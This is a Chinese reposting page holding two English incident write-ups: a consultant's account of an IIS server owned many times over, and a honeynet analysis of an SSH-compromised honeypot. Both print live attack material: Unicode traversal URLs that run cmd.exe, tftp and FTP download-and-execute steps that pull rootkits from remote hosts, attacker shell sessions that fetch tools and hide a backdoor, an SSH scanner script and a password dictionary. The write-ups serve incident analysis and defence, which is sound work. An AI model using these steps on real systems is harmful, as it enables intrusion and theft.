英文资料：网络攻防实录

“日常做梦的宝藏”通过精心收集，向本站投稿了9篇英文资料：网络攻防实录，以下是小编为大家整理后的英文资料：网络攻防实录，欢迎参阅，希望可以帮助到有需要的朋友。

篇1：英文资料：网络攻防实录

Close Encounters of the Hacker Kind: A Story from the Front Line

Date: Dec 20, By Seth Fogie. Article is provided courtesy of Prentice Hall PTR.

Hackers, viruses, and Trojans can cause plenty of headaches, as author Seth Fogie knows from personal experience. Read about one experience he had with a server that was repeatedly hacked. From IIS vulnerabilities to a hacker's IRC server, this article covers it all.

It all started with a fairly innocent call from a client/friend of the family who was having Internet problems. Specifically, he was wondering why his T1 line was moving uncharacteristically slow and was concerned that he may have contracted a virus. This particular client had a past history of becoming victim to viruses and worms, so his concern was valid. I said I would take a look.

Having discovered this client's previous infestation, I was expecting that he probably had become the victim of yet another worm or virus and just needed some simple suggestions and pointers on how to remove it. To my surprise, this prejudice only scratched the surface of the many problems this client was having. As you will learn, my client's network not only had become infected by digital worms, but it also had become home to both a horde of hackers using it as a warez server and a brand new IRC Trojan/IIS worm named Total Kill.

The Client

This particular client is one of those small businesses that doesn't need to hire a full-time computer person. Instead, it relies on the good will and part-time support of friends and family members. As a result, its network has been through the hands of several competent but distinctly unique support personnel during the last couple years, all of which have added to the overall layout and configuration of the network. What makes matters more interesting is that the client was previously a miniCInternet service provider (ISP) for some local-area businesses.

Due to its ISP business, the client purchased a T1 and, with it, several hundred IP addresses and the equipment to manage them. So as to not put these addresses to waste, one of the previous administrators had set up a Cisco router and DHCP server to provide each internal computer with a unique public IP address. In other words, every device on the network has a dedicated IP address that was accessible from the Internet.

At the core of this network is one computer hosting a multitude of services. The computer, running Microsoft's NT4 operating system, operated as a DNS server, DHCP server, Exchange server, primary domain controller, and file server; it also acted as a host to a custom database program for the business. Due to the many services this computer was providing, it was a primary target for viruses and worms. In fact, five months before this situation, the server was inoculated from a Nimda infestation.

The Preliminary Investigation: Day 1, Afternoon

The first thing I needed to do was determine the status of the network. In other words, I was looking for open ports that could indicate the presence of a rogue service or Trojan. The best tool to do this quickly and comprehensively is nmap, which I set up to perform. a full 1C65,535 port scan of the entire IP address range. The command I used to do this is shown here:

nmap -sS -p 1-65535 -O 192.168.0.x-x ( where x represents the range within the subnet)Once nmap was finished probing, I quickly scanned the output, looking for anything fishy or painfully obvious, such as port 31337, 12345, 21, 23, or anything else that represented a rogue service or popular Trojan port. While most of the computers did return positive results on ports 135C139, indicating NetBIOS and possible shares, it was the open on port 80 of the client's main server that got my attention (see Listing 1).

Listing 1-1: nmap Result of the Client's Main Server

Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )

Interesting ports on (192.168.0.66):

(The ports scanned but not shown below are in state: closed)

Port State Service

53/tcp open domain

80/tcp open http

135/tcp open loc-srv

137/tcp filtered netbios-ns

138/tcp filtered netbios-dgm

139/tcp filtered netbios-ssn

593/tcp open http-rpc-epmap

1029/tcp open unknown

1031/tcp open iad2

1035/tcp open unknown

1038/tcp open unknown

1042/tcp open unknown

1490/tcp open unknown Upon finding port 80 open, I immediately opened my browser and plugged in the server's IP address to see if this server was indeed providing Web pages, in addition to the many other things it was responsible for (port 80 is typically the port used by Web servers ). To my dismay, I found the default Internet Information Server (IIS) installation Web page. The next obvious step was to probe the Web server software for known vulnerabilities. So, I fired up a few of my favorite Web browser CGI scanners (whisker, Stealth, CGI4) and went to lunch.

When I got back, to my chagrin, I found that the IIS responded positively to most of the Unicode exploits tested by the scanners. In other words, a weakness in the Web server could be used by hackers and worms alike to infect and take over the server. Since the Unicode exploit is a rather old one, and because of the simple fact that this server was vulnerable, I was rather sure that it had not been patched in some time and was also missing the latest service packs (such as SP 6).

Unicode Explained

Unicode is one of several methods for encoding letters and numbers on a computer. What makes Unicode so distinct is that it provides a unique character for every possible letter or number, regardless of language, platform, or program. As a result, Unicode is supported by most major vendors, including Microsoft, which is responsible for the infamous IIS.

When a Web server is queried for information, it is supposed to return only resources that are located with in its allocated folders. It is not supposed to provide access to any other files on the server through directory traversal. For example, if you open Windows Explorer and make your way to the c:\windows\system32 folder, you will be presented with a file listing of this directory. However, if you go to the c:\windows\system32\..\..\ folder, you will find yourself staring at the c:\ root folder. The “\..\” tells the operating system to move up one level in the folder structure, or traverse the directory. This same technique can be used by Web servers, but it must be controlled to prevent Web users from accessing files and folders not within the Web servers root folder, which is typically c:\inetpub, in the case of IIS.

To control sneaky Web users, IIS programmers included code that reviewed the URL sent to the Web server and restricted directory traversal via the “/../” method. However, in this attempt to stop hackers, the programmers made one small oversight. They forget to include support for Unicode characters. As a result, hackers were able to use Unicode in the URL instead of the normal characters, thus bypassing the protective measures programmed into IIS. This oversight resulted in allowing a hacker to have full access to a server's files. In addition, it was discovered that the Unicode exploit gave its user the power to execute programs. This compounded the problem and made it one of the most serious threats to security that Microsoft ever faced.

Penetration Testing: Day 1, Night

At this point, I had a good notion of where to start probing. Using the following URL, I commanded the server to show me a directory listing of the c:\winnt\system32 directory:

192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/

cmd.exe? /c+dir+c:\winnt\system32\Once the browser returned the results, I scanned the files and folders and quickly spotted several suspicious files that perked my interest. Figure 1 is a screen shot of these files―see if you can spot the problem.

Figure 1 Partial directory listing of c:\winnt\system32\.

Did anything seem like it didn't belong? If you recognized these files for what they are, congratulations! Unfortunately, many network administrators wouldn't give these files a second glance.

The following is a listing of the files that concerned me and why:

PipeCmd.exe: Client side of a remote-control tool used by hackers.

omnithread_tr.dll: One of the three files needed to set up VNC, a popular and legitimate remote-control utility.

VNCHooks.dll: The second of three files needed to set up VNC.

Vnsystask.exe: The third of three files needed to set up an illegitimate back-door VNC program that hides from the user.

nc.exe: Netcat, a very common remote shell program.

pw.exe: Also known as pwdump(2).exe. A program that extracts NT users and passwords.

Samdump.dll: File required by pwdump.exe to extra user account information.

GetAdmin.exe: Common program that gives user administrator rights.

In other words, this server had not one, but two root kits installed in the c:\winnt\system32 directory. As I was about to learn, this was just one of more than 10 root kits that were all competing for the server's attention. In fact, the SysStat directory that is also shown in Figure 1 and that was installed October 7, 2002, includes yet another root kit.

Next, I used another URL to pull up the c:\ directory listing, just to see if there were any interesting files located in the root directory of the server. The following is the URL used. Listing 2 shows the output it provided.

192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/

cmd.exe, /c+dir+c:\Listing 1-2: Directory Listing of the Server's C Drive

Volume in drive C has no label.

Volume Serial Number is DCF0-0832

Directory of C:

10/10/02 01:03p 1,000,000 1mb

05/20/02 09:32a 0 AUTOEXEC.BAT

10/18/02 12:57a 789 bootobc.dll

10/10/02 12:42p 223 CDIR.TXT

05/20/02 09:32a 0 CONFIG.SYS

10/30/02 05:53p 0 dir.txt

11/23/99 10:04a 208,144 dns.exe

06/07/02 11:04a 524,288 errorlog.evt

05/28/02 07:06p

10/04/02 06:38p 0 explorer.exe

10/04/02 06:38p 0 explorer.ini

05/20/02 10:18p

09/24/02 06:49p

09/29/02 01:03p 6,721,536 httpodbc.dll

09/27/02 09:36p

10/18/02 01:11a

10/10/02 12:45p 6,656 INFUSE.EXE

10/10/02 12:43p 602 LOGIN.TXT

10/02/02 02:17p 59,392 ncx99.exe

10/30/02 02:47p 6,693 netstat.txt

10/30/02 10:09a 536,870,912 pagefile.sys

07/24/02 01:29p

10/10/02 12:44p 81 pt.txt

10/14/02 05:21a 1,307 ra_slave.log

10/26/02 01:21p 716 Script.bat

10/26/02 01:21p 95 Script.txt

10/29/02 07:42p 1,949 servudaemon.ini

10/28/02 04:40p 528 ServUStartUpLog.txt

10/04/02 04:25p 15,000,000 SR.CD2-H2O.r41

09/28/02 01:33p

10/10/02 12:43p 17,920 TLIST.EXE

06/18/02 10:00p

09/28/02 01:18p

10/10/02 12:45p 496,836 WINMGNT.EXE

10/30/02 01:09p

35 File(s) 560,918,667 bytesAt this point, I laughed as I started to realize the scope of infestation. In the root directory of the server were two files, scripts.bat and scripts.txt, that all but screamed “installed by a hacker.” Out of curiosity, I decided to pull up the contents of these two files to see what they contained. The following are the URLs I used to do this. Listings 3 and 4 show the contents returned to the browser.

192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/

cmd.exe, /c+type+c:\scripts.bat

192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/

cmd.exe, /c+type+c:\scripts.txtListing 1-3: Contents of the scripts.bat File

Mkdir c:\recycler

Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117

Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash

Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash

old_files

Mkdir d:\recycler

Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117

Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash

Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash

old_files

mkdir e:\recycler

Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784038887-1117

Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784

c:\winnt\system32\ftp -n -s:script.txt

c:\winnt\system32\svhost.exe /i

c:\winnt\system32\psshutdown.exe -r -l -f

Listing 1-4: Contents of the scripts.txt File

open 210.171.xxx.xxx:11515

USER ironfredh

hichic

get svhost.exe

get servudaemon.ini

quitIn other words, this server was H4x0r3d. I was feeling a bit left out of the fun, so I figured I would follow the path so clearly laid before me. So, I typed in one last URL that would execute the ncx99.exe file sitting in the c: directory, and then I telnetted to port 99 on the server:

192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe, /c+c:\ncx99.exeNOTE

ncx99.exe is a popular hacked version of netcat that opens an unprotected shell on port 99. This allows anyone using any operating system that supports Telnet to connect to and control the host system.

Upon connection, I changed the directory to c:\ to verify that I was on the undeniably hacked server. I then performed a full directory listing and outputted the results to a file in the c:\ directory using the dir /s >>dir.txt command, which I then downloaded to my computer for a closer analysis.

Owned by Joe, Mary, Pete, and I Think My Mother

Once I had the results of my directory listing in front of me, I had to laugh again. In fact, I was so astonished that I called my client back and told him, “You know that Exchange server? I think you are the only person on this planet who doesn't own it!” From just a quick scan, I concluded that the server had been owned no less than 10 times. Listing 5 shows just some of the folders that contained root kit files.

Listing 1-5: Folder Listing Containing Root Kits

C:\scripts.bat

C:\temp\win.asp

c:\inetpub

c:\inetpub\scripts

c:\inetpub\wwwroot

c:\inetpub\mailroot\drop\temp

c:\winnt\system32

c:\winnt\system32\sysstatHowever, what really got my attention was the folder listing in Listing 6.

Listing 1-6: Directory of c:\RECYCLER\system\winnt\test\system2

10/26/02 04:48a

10/26/02 04:48a

10/24/02 03:49p

10/24/02 03:50p

FiLL3d by THC

10/24/02 04:00p

10/24/02 04:24p

10/26/02 04:49a

7 File(s) 0 bytesUpon further investigation, I discovered that these folders held about 3GB of illegal warez, mostly consisting of more than 500 GameBoy Advanced ROMs. Based on the dates of the folder/file creations, I thought I had found one of the main reasons the Internet was slowing down. Further investigation of the server revealed that it was also infected with the Nimda worm, which was actively sending out thousands of probes to the Internet as it looked for other targets.

At this time, I once again called the owner and administrator and told them that they should unplug the server and format it completely and thoroughly. I told them that they were hosting illegal files and that it could be a liability for them if they didn't remove it immediately. We discussed options for using firewalls, redesigning their network using a router and NAT-based protection, and ensuring that the new installation did not included the Web server and did include all required patches and service packs. This done, I hung up and started collecting information from the server while it was still up. In particular, I went looking for log files and all the scripts and root kits that were installed by the legion of hackers who owned the computer. It was during this research that the lights went out on the server.

Hacker Scripts

Before we get into the second part of this story, it is important that you understand the methods and tricks that the hackers used when they attempted to take over this server. While I say that this server was owned by more than 10 hackers, they all used the same basic vulnerability and method of attack to gain access to the server. In fact, some of the hackers used the same basic scripts to deal with the details of installing the root kit, saving them from having to manually type the commands.

By far, this server was mostly owned by script. kiddies, not true hackers. While the terms are often blurred, these so-called “hackers” were not out to control the data or programs on the server. In fact, I would be willing to bet that not one of them directly targeted this server, but they all discovered it as a result of a vulnerability scanner. Then, depending on the scanner or script. used to detect the vulnerability, they either came back and took advantage of the Unicode exploit to install their root kit or they had the root kit installed by the script. for them. These root kits often come prepackaged and ready to go, so a “hack” can take as little as three commands and can occur in less than 5 seconds. The first step is to test the server for the vulnerability, the second is to download the root kit to the server, and the third is to install the back door on the server. To illustrate, the URLs in Listing 7 (as found in the Web server's log files) illustrate this three-part hack.

Listing 1-7: The Minimal URLs Required to Own a Server with the Unicode Vulnerability

xx.xx.xx.xxx/scripts/..%5c..%5cwinnt/system32/cmd.exe,

/c+dir+c:\

xx.xx.xx.xxx/scripts/..%5c..%5cwinnt/system32/cmd.exe,

/c+tftp+i+XX.XX.XX.XX+backdoor.exe+c:\backdoor.exe

xx.xx.xx.xxx/scripts/..%5c..%5cwinnt/system32/cmd.exe,

/c+c:\backdoor.exeWhile this is one example, most scripts involve a sequence of more complicated steps before the server is owned. The following illustrates another hack attack and explains what each step does and why it is used. We will discuss these parts in the order in which they are most likely performed.

The first part of any hack attack is to gain access to the server. This is required so that the root kit can be downloaded. Fortunately for a hacker, there are thousands of potentially exploitable back doors. In the case of my client's server, hackers used the Unicode vulnerability to gain control of the Web server software. The following log entry shows one such script. probing for the Unicode vulnerability on my client's server. (Note: This is one log entry, but it was broken into three lines due to display requirements.) I am assuming that this is a script. because the log file shows mere seconds between command. In other words, this is either a very quick-typing hacker or a script. that automates the hacking process.

217.153.XXX.XX, -, 10/30/02, 18:24:06, W3SVC,

EXCHANGE, 64.3.XXX.XX, 32, 149, 2079, 200, 0,

GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+dir+c:\+, As we look as this log entry, we can see where the request was coming from, where it was targeted to, and the URL that was sent. Here we see a variation on the Unicode vulnerability that simply lists the c:\ directory on the victim. The results will be sent back to the client computer (Hacker), which is basically testing to see if the server is vulnerable.

The next step of the process is to download a root kit and other files needed to gain control of the server. Again, our log file provides us with a good example. In this case, the script. creates a file used to FTP the files down to the server. Due to the numerous files downloaded to the server, there was about one page of log entries; therefore, we have taken the liberty of summarizing them.

First, the script. creates a new folder hidden within the c:\Inetpub directory into which the root kit is eventually placed:

217.153.xxx.xxx, -, 10/30/02, 18:25:32, W3SVC, EXCHANGE,

64.3.xxx.xxx, 16, 177, 304, 200, 0, GET, /scripts/

..%5c..%5cwinnt/system32/cmd.exe, /c+mkdir+c:\Inetpub\

mailroot\drop\temp+, Next the script. creates a copy of the cmd.exe file and places it in a newly created directory:

217.153.xxx.xxx, -, 10/30/02, 18:25:32, W3SVC, EXCHANGE,

64.3.xxx.xxx, 62, 211, 331, 200, 0, GET, /scripts/

..%5c..%5cwinnt/system32/cmd.exe, /c+copy+

c:\winnt\system32\cmd.exe+c:\Inetpub\mailroot\drop\temp\doit.exe+,Now the script. ensures that there is no pre-existing file named default.txt in the folder by deleting any file by this name that does exist (another hint this is a script):

217.153.xxx.xxx, -, 10/30/02, 18:25:34, W3SVC, EXCHANGE,

64.3.xxx.xxx, 141, 200, 362, 200, 0, GET, /scripts/

..%5c..%5cInetpub/mailroot/drop/temp/doit.exe,

/c+del+c:\Inetpub\mailroot\drop\temp\default.txt+, Then the script. creates a new default.txt file and starts writing lines of text into it.

217.153.xxx.xxx, -, 10/30/02, 18:25:34, W3SVC, EXCHANGE,

64.3.xxx.xxx, 16, 221, 304, 200, 0, GET, /scripts/

..%5c..%5cInetpub/mailroot/drop/temp/doit.exe, /c+echo+open+

65.40.28.170+>>c:\Inetpub\mailroot\drop\temp\default.txt+, Using the same general URL, the lines in Listing 8 were also written into the default.txt file.

Listing 1-8: Text Lines Written to the default.txt File

Open 65.40.xxx.xxx

user anonymous >>default.txt

echo lol@lol.com >>default.txt

echo cd+rapport/backup >>default.txt

get reboot.exe >>default.txt

get TzoLibr.dll >>default.txt

echo get ServUDaemon.ini >>default.txt

echo get ServUCert.key >>default.txt

get ServUCert.crt >>default.txt

get rundlls32.exe >>default.txt

echo get ncx99.exe >>default.txt

echo get kill.exe >>default.txt

echo get tasklist.exe >>default.txt

echo quit >>default.txt Once all the lines were written to the file, it is easy to see that the script. creates a complete FTP command file. The next URL that the script. sends to the server includes a command to execute FTP, using this file as its command list:

217.153.xxx.xxx, -, 10/30/02, 18:34:31, W3SVC, EXCHANGE,

64.3.xxx.xxx, 525250, 212, 304, 200, 0, GET, /scripts/

..%5c..%5cInetpub/mailroot/drop/temp/doit.exe, /c+ftp+-i+-v+-n+-s:

c:\Inetpub\mailroot\drop\temp\default.txt+, Next the attack script. continues to check the progress of the download by using a URL containing a dir command to list the files in the folder. Once the script. detects the existence of all the files it expects to be downloaded, it builds another file used to set up a back-door FTP server. In this case, the script. will be using Servu-FTP, which is the most common FTP server used by hackers.

In short, the FTP setup file, named servustartuplog.txt, must contain paths to the directories that it will be providing access to. To maximize the impact of the serving capabilities, the script. simply lists every drive letter from c to z. If there is a CD-ROM or mapped drive on the server, all the better for the hacker who uses the FTP server.

The final step in this process is to execute the recently downloaded files, which set up and install the FTP server, and create and install the back-door ncx99.exe file. This is done using another URL using a call command, or through directly executing the executable on the host. The server is now owned. Depending on the script, some of the installation files may be deleted and log files may be wiped. Regardless, it takes only a few minutes to download and install a fully operational root kit that provides file-sharing and remote-control capabilities to any hacker who connects.

Summary

At this point, I discovered that this server was hacked beyond repair. It needed to completely wiped, and both my client and the administrator knew it. However, being the curious sort, I wanted to do some research on the methods and tricks used to take over this server while it was still up. It was during this research that the Web server stopped responding to commands and the back door ceased to function. For now, this is where I leave you.

In Part II of this story, we will be looking at the methods I used to regain control of the server and how these efforts led me down a path to DOOM (quite literally). DDoS IRC bots, over 2,000 owned computers, and more await you in the FiNaL S3c7i0n.

Honeynet analysis for 02 Nov

Analyzer on duty: Steven Sim Kok Leong (steven at security.org.sg)

We have ourselves a compromised honeypot on which a weak test account was exploited over ssh! This is great! An analysis of this compromise follows.

NOTE:Further details were snipped due to sensitivity concerns. If you need them, please email me.

Based on the actions taken by the intruder, I would conclude that this intruder is a script. kiddie because he never bothered to cover any of his tracks by replacing system binaries with trojan ones or cleanse the log files such as the command history.

Below analysis shows that intruders often rely on the same vulnerability and exploits they used to attach the launchpad/zombie to attach other systems from the launchpad/zombie itself. More often than not, the system that compromised you is itself a compromised system. The ultimate motive (e.g. perhaps DDoS etc) for these zombied systems, beyond joining botnets and being used as launchpads to attack other systems on the Internet, are not yet known because at this point there aren't much IRC conversation noticed despite some IRC nick changes and chat messages (which are also reflected in snort alerts). Further monitoring of these channels by subsequent days' duty analyzers may be able to shed more light.

Regardless, in view of the considerable number of systems compromised due to weak passwords, system administrators are reminded to enforce strong passwords. Please refer to the list of recommendations and actions at one of our earlier advisories for system administrators [1]. In addition to these recommendations, from the network perspective network administrators are encouraged to take one or more of the following actions.

Block below list of ports TCP/6667, TCP/7000 and TCP/8888 used by the IRC botnet servers if possible (i.e. not in use by valid services)

Block below list of IRC botnet servers.

Block below list of attacker IP addresses (not very effective as most are dynamic IPs and/or compromised systems i.e. no malicious intent was intended from the administrators of these systems).

Restrict outgoing IRC traffic to a list of trusted IRC servers if possible (Principle of least privileges).

Monitor outgoing TCP/6667, TCP/7000 and TCP/8888 traffic at your border gateway.

Monitor both incoming and outgoing TCP/22 traffic at your border gateway.

In consideration of the pretty persistent ssh dictionary password attacks [1] that have been ongoing for quite some time and targeting our honeynet, a test account with password test was created on 01 Nov 2004 at 1653 hrs for the purpose of having the honeypot compromised so as to observe and analyze hacker behavior. and tactics.

Within less than 3 hours at 1944 hrs, a successful ssh dictionary attack on the test account took place remotely from X.X.X.X (South Korea). However, the session was immediately terminated without any commands being executed. From this, we inferred that it is likely a program script. simply scouring the Internet for accessible ssh accounts with weak passwords and collating results for the intruder who launched the script. to act upon.

On 02 Nov 2004, another successful ssh dictionary attack on the test account took place remotely at 2314 hrs from Y.Y.Y.Y (China). Again, like the session on 01 Nov, the session was immediately terminated once the SSH session was established.

7 mins later at 2321 hrs on the same day, an intruder (either based on 01 Nov 1944 hrs or 02 Nov 2314 hrs results) started dropping his goods through the test account backdoor from Z.Z.Z.Z (South Korea). You will notice further in this analysis report that Z.Z.Z.Z is itself a compromised system that joined the IRC botnet (refer to list of compromised systems detected in the botnet).

He launched the following commands. The typos are indicative of a manual attack unlike earlier ssh dictionary attacks. In fact, the intruder specifically had problems with typing e i.e. either missing an “e” or missing the “e” and typing “w” and also occasionally missing “p”s and “t”s.

Command sequenceExplanationwChecking whether I am online..;-)cd /tmpChange directory to /tmpwGot worried. Checking whether I am online, againlsPerform. a listing of the /tmp/directorywget A.A.A.A/cel.tgzDownload cel.tgztar zxvf cel.tgzUnzip cel.tgzrm -rf cel.tgzRemove cel.tgzcd sshChange directory to the ssh directory retrieved from cel.tgzlsPerform. a directory listinglsPerform. a directory listing again, perhaps couldn't believe what he saw?./assh XLaunch ssh dictionary attack at X.0.0.0/8 class A network. The portscan alerts by snort in the summary is a result of this.wGot worried again. Checking again whether I am online.passwdChanging password to protect his turfwget B.B.B.B:793/~zorg/local.tar.gzDownload local exploit archive local.tar.gz deposited on polarhome at Aug 11 22:31wget C.C.C.C/ccccccc/local.tar.gzDownload another local exploit archive local.tar.gz, similar in size to the one downloaded from B.B.B.B except the timestamp. This one is deposited on Oct 6 22:11 at the geocities site.wget D.D.D.D/psybnc.jpgAttempt download of a bnc irc backdoor archive. Unfortunately the file is not accessible over the web.wget E.E.E.E/psybnc.jgAttempt failed because of typo. E.E.E.E/psybnc.jpg does exist.ftpIntruder resorted to ftp'ing from D.D.D.D to download psybnc.jpg instead. Refer to more details belowpassedAttempt password change of account to protect new turf, failed because of typo.passwdAnother attempt but failed because typo with the passwordpasswdPerhaps he was typing slower now so password change now successful.tar zxvf psybnc.jpgUntaring the bnc irc client archive that masqueraded with a jpg extension to hide its harmful intensions.rm -rf psybnc.jpgRemoving the bnc irc backdoor archivecd xsfChange directory to the xsf directory retrieved from psybnc.jpgmv crond sh“ ”-iMove malicious bnc irc backdoor program called crond to sh“ ”-I to prevent it from being detected in ps process listingexport PATH=“.”Set the path so that the malicious binary can find assisting files in the same directory.sh“ ”-iLaunch the backdoorexitNot sure why he has to type exit so many timesexiTypo againtexitTypo again. Not a very good typist or lousy keyboard.exitYet another tryexitYet another time when he finally exited.

This logon session took 12 mins.

First, lets take a deeper look into cel.tar.gz that was downloaded and the ./assh tool.

Listing ofcel.tar.gz:

drwx------ httpd/root 0 2004-10-11 02:09:43 ssh/

-rwx------ httpd/root 453972 2004-07-13 02:09:58 ssh/ss

-rwxr-xr-x httpd/root 842424 2004-09-06 18:20:58 ssh/sshf

-rwx------ httpd/root 85 2004-07-13 02:10:33 ssh/go.sh

-rwx------ httpd/root 21407 2004-07-22 05:58:57 ssh/pscan2

-rwx------ httpd/root 206 2004-07-22 08:52:59 ssh/auto

-rwx------ httpd/root 605 2004-09-06 23:11:00 ssh/assh

-rwx------ httpd/root 4225 2004-07-22 08:35:14 ssh/129

-rw------- httpd/root 0 2004-07-23 08:28:03 ssh/129.98.pscan.22

Listing of./assh script:

#!/bin/bash

if [ $# != 1 ]; then

echo “ usage: $0 ”

exit;

fi

echo “ Versiune de scaner privata!”

echo “----------------------------------------------------”

echo “ All my love for Liz! ”

echo “----------------------------------------------------”

echo “# incep scanarea ...”

./pscan2 $1 22

sleep 10

cat $1.pscan.22 |sort |uniq >uniq.txt

oopsnr2=`grep -c . uniq.txt`

echo “# Am gasit $oopsnr2 de servere”

echo “----------------------------------------”

echo “# Incepem...”

./sshf 50

rm -rf $1.pscan.22 uniq.txt

echo “Asta a fost tot”

If we take a closer look atpscan2, here is its usage syntax to scan for servers having SSHD service running at TCP port 22.

Usage: %s

[c-block]

Also looking at./sshfbeing launched from the script, it contains a dictionary of userids cum passwords used in the ssh dictionary attack. openssl 0.9.7d libraries are used in the attack.

Here is thelist of userids cum passwords used:

nobody

patrick

qwerty

compas

sniper

12345678

123456789

1234567890

rolo66

rolo

iceuser

horde

cyrus

wwwrun

matt

teste

test

test2

test23

test123

www-data

mysql

operator

apache

switch

c43vr013T

1gcec19v8yz153072

jane

pamela

shadow

eegch11

r00t

abcd1234

ctxmonitor

cosmin

%username%

%null%

00000000

111111

1234qwer

1p2o3i

@#$%^&

apollo

passwor

passion

passwd

redhat

people

qwaszx

qwert

tester

zxcvbnm

zxcvb

zorro

e4K1mo0$

f4r6k2g7t9q3

w5n8o7t9i6x3

o6v9z3d8y7m9

k1u7r1t2r1t8

w5u6s9v7k5t4

linux

stones

yellow

cooling

b604092

bash

cmcnew

kH9dzv

toor

actros

cip52

pharma

cip51

spyder

bk123qwe

Lex1c0n3

1q2w3e

webmaster

user01

user1

user02

oracle

sybase

account

backup

adam

alan

frank

george

henry

john

love

hate

iloveyou

present

While the tools in local.tar.gz were never used, it contains the following

README listing:

all around local exploits..

4 linux , sunos , freebsd..

all public , no one private..

-

have phun

Zorg of texter

rohackingggggggggggggggg..:=)

Directory listing:

-rwxr-xr-x 1 5775 users 463529 Feb 23 2004 brk

-rwxr-xr-x 1 5775 users 452101 May 4 2004 brk2

-rwxr-xr-x 1 5775 users 4817 Jun 15 07:03 bsdsh

-rwxr-xr-x 1 5775 users 16154 Jul 31 07:06 dexter

-rwxr-xr-x 1 5775 users 17472 Jul 31 07:08 doptikbd

-rwxr-xr-x 1 5775 users 6 Jul 31 07:13 f3

-rwxr-xr-x 1 5775 users 14860 Jul 31 06:41 kmod

-rwxr-xr-x 1 5775 users 19517 Jul 31 06:41 kmod2

-rwxr-xr-x 1 5775 users 445808 Aug 11 22:23 loginx

-rwxr-xr-x 1 5775 users 3078 Jun 20 man-rh7.sh

-rwxr-xr-x 1 5775 users 1327 Jun 20 2001 modutils.sh

-rwxr-xr-x 1 5775 users 19414 Jul 31 06:29 mremap2

-rwxr-xr-x 1 5775 users 425887 Jul 31 06:30 mremap_pte

-rwxr-xr-x 1 5775 users 1729 May 5 2001 prlnx.sh

-rwxr-xr-x 1 5775 users 19910 Mar 20 pt

-rwxr-xr-x 1 5775 users 19242 Jul 31 07:08 r0nin

-rw-r--r-- 1 5775 users 147 Aug 11 22:23 README

-rwxr-xr-x 1 5775 users 17318 Jul 31 07:08 rsybd

-rwxr-xr-x 1 5775 users 2311 May 5 2001 smlnx.sh

-rwxr-xr-x 1 5775 users 1759 Jul 31 06:52 stringetz

-rwxr-xr-x 1 5775 users 468689 Jul 31 06:30 w00t

-rwxr-xr-x 1 5775 users 4625 May 5 2001 xperl.sh

Looking at the psybnc tool used

In psybnc.conf residing in the xsf directory, it shows that the system port TCP port 65500 is used.

PSYBNC.SYSTEM.PORT1=65500

PSYBNC.SYSTEM.HOST1=*

PSYBNC.HOSTALLOWS.ENTRY0=*;*

Let us check out the FTP session that was initiated.

Sebek was not yet installed on this honeypot. Thus, what goes on behind the ftp command is derived from the honeywall pcap trace. Afterall ftp is clear-text. Here are some snapshots of the hexadecimal and ascii traces.

Intruder logged in using the userid abc (masked)

07:30:58.280013 X.X.X.X.38381 >D.D.D.D.ftp: P 1:16(15) ack 24 win 5840 (DF) [tos 0x10]

0x0000 4510 0037 da54 4000 4006 b4b9 XXXX XXXX E..7.T@.@...XXXX

0x0010 DDDD DDDD 95ed 0015 62aa a912 fdb1 c69c DDDD....b.......

0x0020 5018 16d0 8154 0000 5553 4552 20aa bbcc P....T.. USER.abc

Intruder logged in using the password xyz (masked)

07:31:01.572491 X.X.X.X.38381 >D.D.D.D.ftp: P 16:30(14) ack 61 win 5840 (DF) [tos 0

x10]

0x0000 4510 0036 da56 4000 4006 b4b8 XXXX XXXX E..6.V@.@...XXXX

0x0010 DDDD DDDD 95ed 0015 62aa a921 fdb1 c6c1 DDDD....b..!....

0x0020 5018 16d0 67bf 0000 5041 5353 20xx yyzz P...g...PASS.xyz

Intruder downloaded psybnc.jpg

07:31:36.760693 D.D.D.D.ftp >X.X.X.X.38381: P 310:381(71) ack 90 win 5840 (DF)

0x0000 4500 006f a55a 4000 3106 f88b DDDD DDDD E..o.Z@.1...DDDD

0x0010 XXXX XXXX 0015 95ed fdb1 c7ba 62aa a96b XXXX........b..k

0x0020 5018 16d0 f43b 0000 3135 3020 4f70 656e P....;..150.Open

0x0030 696e 6720 4249 4e41 5259 206d 6f64 6520 ing.BINARY.mode.

0x0040 6461 7461 2063 6f6e 6e65 6374 696f 6e20 data.connection.

0x0050 666f 7220 7073 7962 6e63 2e6a 7067 2028 for.psybnc.jpg.(

0x0060 3539 3637 3330 2062 7974 6573 290d 0a 596730.bytes)..

Using the same ftp userid and password, all the exploits in the repository can be retrieved for research.

# ftp D.D.D.D

Connected to D.D.D.D (D.D.D.D).

220 D.D Members FTP

Name (D.D.D.D:root): abc

331 Password required for abc.

Password:

230 User abc logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp>ls

227 Entering Passive Mode (D,D,D,D,102,150).

150 Opening ASCII mode data connection for file list

-rw-r--r-- 1 free web 37558 Oct 15 14:00 big.jpg

-rw-r--r-- 1 free web 377371 Aug 29 19:32 bk.tar.gz

-rw-r--r-- 1 free web 13342 Oct 18 17:58 brutessh2.tgz

-rw-r--r-- 1 free web 787019 Oct 13 17:24 dcstealth.zip

-rw-r--r-- 1 free web 720324 Sep 26 07:59 emech-madalin.tar.gz

-rw-r--r-- 1 free web 720348 Sep 21 18:56 emech.tar.gz

-rw-r--r-- 1 free web 720336 Sep 26 16:58 emechm.tar.gz

-rw-r--r-- 1 free web 173960 Sep 14 14:15 flood.tgz

-rw-r--r-- 1 free web 391294 Sep 24 11:19 massSSH.tgz

-rw-r--r-- 1 free web 717959 Sep 2 20:16 mech.tar.gz

-rw-r--r-- 1 free web 9052 Sep 16 18:09 miro.tgz

-rw-r--r-- 1 free web 80679 Oct 2 12:19 muie.mp3

